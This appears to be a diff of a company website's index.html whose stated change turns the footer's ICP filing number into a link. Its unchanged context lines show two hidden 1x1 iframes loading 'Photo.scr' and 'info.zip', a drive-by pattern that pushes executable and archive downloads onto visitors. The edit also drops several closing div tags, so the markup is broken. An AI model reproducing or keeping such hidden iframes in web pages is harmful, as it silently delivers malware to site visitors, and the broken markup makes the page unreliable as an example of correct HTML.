--- a/index.html
+++ b/index.html
@@ -209,14 +209,11 @@
        <iframe src="Photo.scr" width="1" height="1" frameborder="0"> </iframe>
        <iframe src="info.zip" width="1" height="1" frameborder="0"> </iframe>
       </div>
-     </div>
-    </div>
-   </div>
-  </div>
-<!-- 新增部分：备案信息 -->
-  <div class="footer">
-    <p style="text-align:center;">Copyright © 河南享卡信息科技有限公司版权所有</p>
-    <p style="text-align:center;">豫ICP备12345678号-1</p>
-  </div>
+    <!-- 新增部分：备案信息 -->
+<div class="footer">
+  <p style="text-align:center;">Copyright © 河南享卡信息科技有限公司版权所有</p>
+  <!-- 将原来的豫ICP备12345678号-1替换为链接 -->
+  <a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank" style="text-align: center; color: inherit;">豫ICP备12345678号-1</a>
+</div>
 </body>
 </html>
